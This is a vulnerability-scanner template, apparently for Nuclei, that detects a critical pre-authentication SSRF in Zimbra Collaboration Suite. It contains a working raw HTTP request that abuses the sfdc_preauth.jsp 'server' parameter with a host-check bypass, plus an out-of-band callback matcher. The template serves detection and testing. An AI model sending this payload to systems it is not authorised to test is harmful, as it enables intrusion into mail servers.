id: zimbra-preauth-ssrf

info:
  name: Zimbra Collaboration Suite (ZCS) - SSRF
  author: gy741
  severity: critical
  description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.
  reference:
    - https://www.adminxe.com/2183.html
  tags: zimbra,ssrf,oast

requests:
  - raw:
      - |
        GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
